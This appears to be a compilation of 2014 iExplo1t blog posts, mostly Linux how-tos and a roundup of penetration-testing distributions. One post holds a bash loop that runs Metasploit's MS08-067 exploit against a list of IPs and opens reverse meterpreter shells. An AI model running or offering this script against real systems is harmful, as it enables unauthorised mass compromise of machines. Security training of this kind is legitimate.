How To: Configure VPN in Kali Linux

A virtual private network (VPN) extends a private network across a public network, such as the Internet. It enables a computer to send and receive data across shared or public networks as if it is directly connected to the private network, while benefiting from the functionality, security and management policies of the private network A VPN is created by establishing a virtual point-to-point connection through the use of dedicated connections, virtual tunneling protocols, or traffic encryptions. On Kali Linux, by default VPN options are grayed out. This guide will show users how to install necessary packages to fix VPN grayed out issue and enable VPN on Kali Linux.

A virtual private network connection across the Internet is similar to a wide area network (WAN) link between sites. From a user perspective, the extended network resources are accessed in the same way as resources available within the private network. Through VPN you can access your private network over Internet.

VPNs allow employees to securely access their company’s intranet while traveling outside the office. Similarly, VPNs securely connect geographically disparate offices of an organization, creating one cohesive network. VPN technology is also used by Internet users to connect to proxy servers for the purpose of protecting personal identity and location. [Source:WikiPedia]

Why use VPN – benefits?

Here’s my top 11 reasons why you would want to use VPN services.

1. VPN provides Privacy and cloaks your IP address.
2. Use any network (public or private or free WiFi) with encryption
3. Login to your home or Work network from anywhere with confidence.
4. Bypass censorship and content monitoring.
5. Browse and bypass Firewall and censorship policy at work or Anywhere!
6. Access region restricted services from anywhere (i.e. Youtube videos, NetFlix or BBC Player etc.)
7. Transfer or receive files with privacy.
8. Hide your voice/VOIP calls.
9. Use Search Engines while hiding some of your identity.
10. Hide yourself
11. Cause you like to be anonymous.

As you can see from the list above, VPN not necessarily hides everything. Search engines can probably still recognizes you based on your cookies, previous browsing behavior, account sign-in (duh!), browser plug-ins (i.e. Alexa, Google Toolbar etc.).

Copyright © 2014 iExplo1t.com All Rights Reserved.

How To: Configure VPN in Kali Linux

linux

from iExplo1t http://ift.tt/1lwWOEz

How To Uninstall Linux from a Dual-Boot Windows using EasyBCD

OK, so, you’ve tried a Linux distro for netbooks (like Ubuntu) and you’ve decided, “Hey, I don’t like this.” I’ve been there, too.
But now, whenever you boot, you get an annoying GRUB menu asking you to select what OS you want to boot into, and you have to scramble to switch to Windows. Plus, you’ve got a swath of disk space you can’t use anymore because the Linux distro you don’t want any more is using it. Most people would advise using a EasyBCD.

Copyright © 2014 iExplo1t.com All Rights Reserved.

How To Uninstall Linux from a Dual-Boot Windows using EasyBCD

linux, Windows

from iExplo1t http://ift.tt/1ACEC69

Kali Linux – Complete Re-install of GRUB from Live (CD/USB)

Hi all
This video tutorial will show you how you can use an Kali LiveCD / USB Drive to reinstall GRUB, even when your boot device is inaccessible, sometimes damaged by windows installations, or other OS’s
You have to know your Kali partition (GPARTED/fdisk -l) and mount it.

Commands used in this video:

mount the linux partition on /mnt

mount /dev/sda1 /mnt

Using the linux installation on your hard drive instead of /dev/sda1

mount (bind) the live CD dir with installed linux dir

mount –bind /dev /mnt/dev
mount –bind /proc /mnt/proc
mount –bind /sys /mnt/sys

Get the root privaleg
chroot /mnt

Install the Grub

grub (Type: TAB Twice)
grub-install /dev/sda ***** Using your boot device instead of /dev/sda

Update the Grub

grub-mkconfig -o boot/grub/grub.cfg

CTRL-D
umount /mnt/dev
umount /mnt/proc
umount /mnt/sys
umount /mnt

reboot

Contact Me : contact@iexplo1t.com

Follow Us
http://ift.tt/1nE0OI1; (Budget Equipment)
http://ift.tt/1l0Q2ui (For Extra Help)
Don’t forget to subscribe as it’s FREE.
http://ift.tt/1mJCaFZ

Copyright © 2014 iExplo1t.com All Rights Reserved.

Kali Linux – Complete Re-install of GRUB from Live (CD/USB)

linux, Kali Linux

from iExplo1t http://ift.tt/1pBEN9g

20 Things that you can do with Linux but not with Mac or Windows

Someone asked me this recently. I don’t have just one answer. I compiled a list of things I thought of and emailed it to my friend…then I thought I would post it here for future reference. Feel free to add to the list! There is also a forums thread on the same topic, that I remembered as I complied my thoughts, so I stole some of the ideas posted there.

1. Upgrade to the newest version legally and without paying money
2. Have the latest version of the operating system run faster than the previous version on the same hardware
3. Easily install and run different graphical interfaces if I don’t like the default setup
4. Install twenty programs with one command
5. Have the system automatically update all my installed programs for me.

6. Install the same copy of my OS (Ubuntu) on multiple computers without worrying about license restrictions or activation keys
7. Give away copies of the operating system and other programs that run on it without breaking any laws, governmental or ethical or moral, because it was all intended to be used this way
8. Have full control over my computer hardware and know that there are no secret back doors in my software, put there by malicious software companies or governments
9. Run without using a virus scanner, adware/spyware protection, and not reboot my computer for months, even when I do keep up with all of the latest security updates

10. Run my computer without needing to defragment my hard drive, ever
11. Try out software, decide I don’t like it, uninstall it, and know that it didn’t leave little bits of stuff in a registry that can build up and slow down my machine
12. Make a major mistake that requires a complete reinstallation and be able to do it in less than an hour, because I put all of my data on a separate partition from the operating system and program files

13. Boot into a desktop with flash and effects as cool as Windows Vista on a three year old computer…in less than 40 seconds, including the time it takes me to type my username and password to login
14. Customize anything I want, legally, including my favorite programs. I can even track down the software developers to ask them questions, contribute ideas, and get involved in the actual design/software writing process if I want to
15. Have 4+ word processor windows open working on papers, listen to music, play with flashy desktop effects, have contact with a largely happy community and have firefox, instant messaging, and email clients all open at the same time, without ever having had to beg someone for a code to make my os work, and without the system running so slow it is useless

16. Use the command “dpkg –get-selections > pkg.list” to make a full, detailed list of all software I have installed, backup my /etc and /home directories on a separate partition, and you are able to recover your system any time, easily
17. Run multiple desktops simultaneously, or even allow multiple users to log in and use the computer simultaneously
18. Resize a hard disk partition without having to delete it and without losing the data on it
19. Use the same hardware for more than 5 years before it really needs to be replaced…I have some hardware that is nearly 10 years old, running Linux, and still useful
20. Browse the web while the OS is being installed!
21. Use almost any hardware and have a driver for it included with the operating system…eliminating the need to scour the internet to find the hardware manufacturer’s website to locate one
22. Get the source code for almost anything, including the OS kernel and most of my applications

Copyright © 2014 iExplo1t.com All Rights Reserved.

20 Things that you can do with Linux but not with Mac or Windows

linux

from iExplo1t http://ift.tt/1xx8PB3

ArtistX – The Linux Distro for Artists

ArtistX is a fantastic Ubuntu based Linux Distro developed by Marco Ghirlanda in Milan, Italy.  It features a wide range of free 2D/3D graphic, audio, and video editing soft-ware that can be installed or accessed via live-USB booting; to make any machine into a fully equipped production suite.

The range of soft-ware included in ArtistX is quite impressive. Some of them being Blender for 3D modelling, Gimp for 2D image alteration, Animata for cartoon animation, and Cinepaint for video editing. A full list can be found on the ArtistX website.

I’ve been using this distro for a while now and I have to say my impressions are very good. It runs well with very little lag on my low end netbook. The design is simple and nice. But most of all the provided arsenal of soft-ware gives you everything you could possibly want, to work on almost any sort of project whether it be film, animation, or writing.

If you’re on a tight budget and looking for a great OS designed for creative individuals that maintains a Linux environment, ArtistX is definitely for you.

Copyright © 2014 iExplo1t.com All Rights Reserved.

ArtistX – The Linux Distro for Artists

linux, articles

from iExplo1t http://ift.tt/1jfuDsM

Hack Multiple Systems with MSFCLI and Bash Scripting

In this video, I will demonstrate how to simultaneously exploit multiple machines with a common vulnerability using MSFCLI (Metasploit Framework Command Line Interface) and bash scripting. I will perform this demonstration by exploiting three windows machines simultaneously and acquiring a reverse TCP meterpreter shell on each system.

Commands :

#!/bin/bash

i=4444
for ip in $(cat iplist.txt)
do
gnome-terminal -x msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=$ip LHOST=192.168.1.8 LPORT=$i E
echo “Exploiting $ip and establishing reverse connection on local port $i”
i=$(($i+1))
done

Copyright © 2014 iExplo1t.com All Rights Reserved.

Hack Multiple Systems with MSFCLI and Bash Scripting

linux, BackBox, Kali Linux, BackTrack

from iExplo1t http://ift.tt/1onDPCL

How To: Fix the GPG error in updater “NO_PUBKEY”

For who have this problem (NO_PUBKEY)

root@kali = gpg –keyserver pgp.mit.edu –recv-keys THEKEY
root@kali = gpg –armor –export THEKEY | apt-key add –

Copyright © 2014 iExplo1t.com All Rights Reserved.

How To: Fix the GPG error in updater “NO_PUBKEY”

linux, BackBox, Kali Linux, BackTrack, Ubuntu

from iExplo1t http://ift.tt/1odghMF

How To Install Kali Tools in Linux Mint (Works for all versions!)

THIS IS NOT 100% PERFECT , you will get some errors as its different distro version, but generally will work fine, it will take quite a wile to download and install all the apps (1.8-2.3 GB), 
depending on system and internet speed !)

Copyright © 2014 iExplo1t.com All Rights Reserved.

How To Install Kali Tools in Linux Mint (Works for all versions!)

Linux Mint, linux, BackBox, Kali Linux, BackTrack

from iExplo1t http://ift.tt/1jezq0y

How To: Install Flareget in Kali Linux (Best Downlaod Manager)

Hello Dragon’s. As you may know, FlareGet is an open source, multi-threaded, multi-segment popular download manager and accelerator, working on Linux. (like uGet or XDMAN).  The latest version available is FlareGet, which comes with new browser integration extensions and direct download support for file sharing sites.

For more information, see the official changelog.

Copyright © 2014 iExplo1t.com All Rights Reserved.

How To: Install Flareget in Kali Linux (Best Downlaod Manager)

linux, BackBox, Kali Linux, BackTrack

from iExplo1t http://ift.tt/1oAxS4l

TOP 13 PENETRATION TESTING LINUX DISTRIBUTIONS

[Source: concise-courses.com]

OK, none of the following Pentesting distributions were in the top 100 list over at Distro Watch but we don’t care – we are talking about penetration testing tools – or specifically the creation of distro’s that have all the necessary  open source tools that help ethical hackers and penetration testers do their job. Like everything else when it comes to choices, every pentesting distro has its own pros, cons and specialty. Some distro for example are better at web application vulnerability discovery, forensics, WiFi cracking, reverse engineering, malware analysis, social engineering etc.

---

1. Kali Linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), and Aircrack-ng (a software suite for penetration-testing wireless LANs). Kali Linux can be run from a hard disk, live CD, or live USB. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits.

Kali Linux is distributed in 32- and 64-bit images for use on hosts based on the x86 instruction set, and as an image for the ARM architecture for use on the Raspberry Pi computer and on Samsung’s ARM Chromebook.

9. BackTrack 5R3

The mamma or best known of Linux pentesting distros. BackTrack has a very cool strapline: “The quieter you become, the more you are able to hear.” That just sounds cool….

BackTrack is based on the ever-popular Ubuntu. The pentesting distro used to be only available within a KDE environment but Gnome become was added as an option with the release of BackTrack v5. For those working in Information Security or intrusion detection, BackTrack is one of the most popular pentesting distros that can run on a live CD or flash drive. The distribution is ideal for wireless cracking, exploiting, web application assessment, learning, or social-engineering a client.

Here is a list of some of the awesome tools available in BackTrack 5r3 (the latest release).

To identify Live Hosts:
dnmap – Distributed NMap
address6 – (which acts as a IPV6 address conversion)

Information Gathering Analysis (Social Engineering)
Jigsaw – Grabs information about company employees
Uberharvest – Email harvester
sslcaudit – SSL Cert audit
VoIP honey – VoIP Honeypot
urlcrazy – Detects URL typos used in typo squatting, url hijacking, phishing

Web Crawlers
Apache_users – Apache username enumerator
Deblaze – Performs enumeration and interrogation against Flash remote end points

Database Analysis
Tnscmd10g – Allows you to inject commands into Oracle
BBQSQL – Blind SQL injection toolkit
* If you are interested in Database Security see our Hacker Halted summary here.

Bluetooth Analysis
Blueranger – Uses link quality to locate Bluetooth devices

Vulnerability Assessment
Lynis – Scans systems & software for security issues
DotDotPwn – Directory Traversal fuzzer

Exploitation Tools
Netgear-telnetable – Enables Telnet console on Netgear devices
Terminator – Smart Meter tester
Htexploit – Tool to bypass standard directory protection
Jboss-Autopwn – Deploys JSP shell on target JBoss servers
Websploit – Scans & analyses remote systems for vulnerabilities

Wireless Exploitation Tools
Bluepot – Bluetooth honeypot
Spooftooph – Spoofs or clones Bluetooth devices
Smartphone-Pentest-Framework
Fern-Wifi-cracker – Gui for testing Wireless encryption strength
Wi-fihoney – Creates fake APs using all encryption and monitors with Airodump
Wifite – Automated wireless auditor

Password Tools
Creddump
Johnny
Manglefizz
Ophcrack
Phrasendresher
Rainbowcrack
Acccheck
smbexec

---

3. NodeZero.

Like BackTrack, NodeZero is an Ubuntu based distro used for penetration testing using repositories so every time Ubuntu releases a patch for its bugs, you also are notified for system updates or upgrades. Node Zero used to be famous for its inclusion of THC IPV6 Attack Toolkit which includes tools like alive6, detect-new-ip6, dnsdict6, etc, but I think that these days BackTrack 5r3 also includes these tools.

Whereas BackTrack is touted as being a “run-everywhere” distro, i.e. running it live, NodeZero Linux (which can also be run live) state that the distros real strength comes from a hard install. NodeZero, in their own words, believe that a penetration tester “requires a strong and efficient system [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable Linux environment. Sounds cool. Ever tried it? Let us know in the comments below.

---

4. BackBox Linux

BackBox is getting more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an Ubuntu-based distribution developed to perform penetration tests and security assessments. The developers state that the intention with BackBox is to create a pentesting distro that is fast and easy to use. BackBox does have a pretty concise looking desktop environment and seems to work very well. Like the other distros BackBox is always updated to the latest stable versions of the most often used and best-known ethical hacking tools through repositories.

BackBox has all the usual suspect for Forensic Analysis, Documentation & Reporting and Reverse Engineering with tools like ettercap, john, metasploit, nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.

---

5. Blackbuntu.

Yes, as the name clearly suggests, this is yet another distro that is based on Ubuntu. Here is a list of Security and Penetration Testing tools – or rather categories available within the Blackbuntu package, (each category has many sub categories) but this gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensic, Reverse Engineering and a Miscellaneous section. This list is hardly revolutionary but the tools contained within might be different to the other distros.

---

6. Samurai Web Testing Framework.

This is a live Linux distro that has been pre-configured with some of the best of open source and free tools that focus on testing and attacking websites. (The difference with Samurai Web Testing Framework is that it focuses on attacking (and therefore being able to defend) websites. The developers outline four steps of a web pen-test. These steps are incorporated within the distro and contain the necessary tools to complete the task.
Step 1: Reconnaissance – Tools include Fierce domain scanner and Maltego.
Step 2: Mapping – Tools include WebScarab and ratproxy.
Step 3: Discovery – Tools include w3af and burp.
Step 4: Exploitation – Tools include BeEF, AJAXShell and much more.

Of interest as well, the Live CD also includes a pre-configured wiki, set up to be a central information store during your pen-test.

The Samurai Web Testing Framework is a live Linux distro that focuses on web application vulnerability research and web pentesting within a “safe environment” – i.e. so you can ethical hack without violating any laws. This is a pentesting distro recommended for penetration testers who wants to combine network and web app techniques.

---

7. Knoppix STD.

This distro is based on Debian and originated in Germany. The architecture is i486 and runs from the following desktops: GNOME, KDE, LXDE and also Openbox. Knoppix has been around for a long time now – in fact I think it was one of the original live distros.

Knoppix is primarily designed to be used as a Live CD, it can also be installed on a hard disk. The STD in the Knoppix name stands for Security Tools Distribution. The Cryptography section is particularly well-known in Knoppix.

---

8. Pentoo.

Pentoo is a security-focused live CD based on Gentoo. In their own words “Pentoo is Gentoo with the pentoo overlay.” So, if you are into Pentoo then this is the distro for you. Their homepage lists some of their customized tools and kernel, including: a Hardened Kernel with aufs patches, Backported Wifi stack from latest stable kernel release, Module loading support ala slax, XFCE4 wm and Cuda/OPENCL cracking support with development tools.

---

9. WEAKERTH4N.

This penetration distribution is built from Debian Squeeze and uses Fluxbox for its’ desktop environment. This pentesting distro is particularly well adjusted for WiFi hacking since it contains many Wireless tools. Here is a quick summary of WEAKERTH4N’s tool categories: Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing, Android Hacking, Networking and Shells.

---

10. Matriux Krypton.

This linux distro is, I believe, is the first security distribution based directly on Debian, (after WEAKERTH4N?) if I am wrong please comment below! There are 300 security tools to work, called “arsenals”. The arsenals allow for penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations,  exploiting, cracking and data recovery. The last category, data recovery, doesn’t seem to be prevalent in the other distros.

---

11. DEFT.

The latest version is DEFT 7 which is based on the new Linux Kernel 3 and the DART (Digital Advanced Response Toolkit). This distro is more orientated towards Computer Forensics and uses LXDE as desktop environment and WINE for executing Windows tools under Linux. The developers, (based in Italy) hope that their distro will be used by the Military, Police, Investigators, IT Auditors and professional penetration testers. DEFT is an abbreviation for “Digital Evidence & Forensic Toolkit”

---

12. CAINE

A reader to our blog suggested to add CAINE which we duly have. CAINE Stands for Computer Aided Investigative Environment, and like many information security products and tools – it is Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organized to integrate existing software tools that are composed as software modules, all displayed within a friendly graphical interface. CAINE states to have three objectives. These are, to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation. Secondly that the distro has a user friendly graphical interface and finally that it provides a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open-source.

If anyone has used this please let us know.

---

13. BugtTraq

Bugtraq is another reader submitted pentesting distro. Based on the 26.6.38 kernel, this distro offers a really wide range of penetration and forensic tools. Like most of the others in this list, Bugtraq can hard-install of obviously run as a Live DVD or from a USB drive. Bugtraq claims to have recently configured and updated the kernel for better performance but also importantly so that it can recognize more hardware, including wireless injection patches pentesting. The team at Bugtraq seem solid because they are clearly making an effort to get the kernel to work with more hardware – something which the other distributions don’t always place enough importance.

Some of the special features included with Bugtraq include (as stated) an expanded range of recognition for injection wireless drivers, (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc.

Unique to Bugtraq (as claimed on their site) is the ability to, or better said, ease, of deleting tracks and backdoors. Just by having read about Bugtraq I’m really glad that I can add this to the list because it just sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Buqtraq: Malware, Penetration Shield, Web audit, Brute force attack, Communication and Forensics Analytics, Sniffers, Virtualizations, Anonymity and Tracking, Mapping and Vulnerability detection.

Quick Summary: You can’t go wrong with any Ubuntu based distro. BackTrack does the job well but I guess, of course, it’s all personal – i.e. does the distro do the job for you? Every penetration tester needs a lean towards a particular tool or tool-set. Frankly they are all good, and it would be prudent to use several of these pentesting distros as live versions. For WiFi hacking then WEAKERTH4N is likely your better friend, whilst to stay within the law, use Samurai.

Bugtraq looks really good – the team behind it seems to have taken considerable time to tick all the boxes. Once we test it I’ll update the post.

Here is a list of other distros (which we think are still alive and kicking – please correct us if we are wrong).

Copyright © 2014 iExplo1t.com All Rights Reserved.

TOP 13 PENETRATION TESTING LINUX DISTRIBUTIONS

linux, BackBox, Kali Linux, BackTrack, articles, Ubuntu

from iExplo1t http://ift.tt/1nBMY72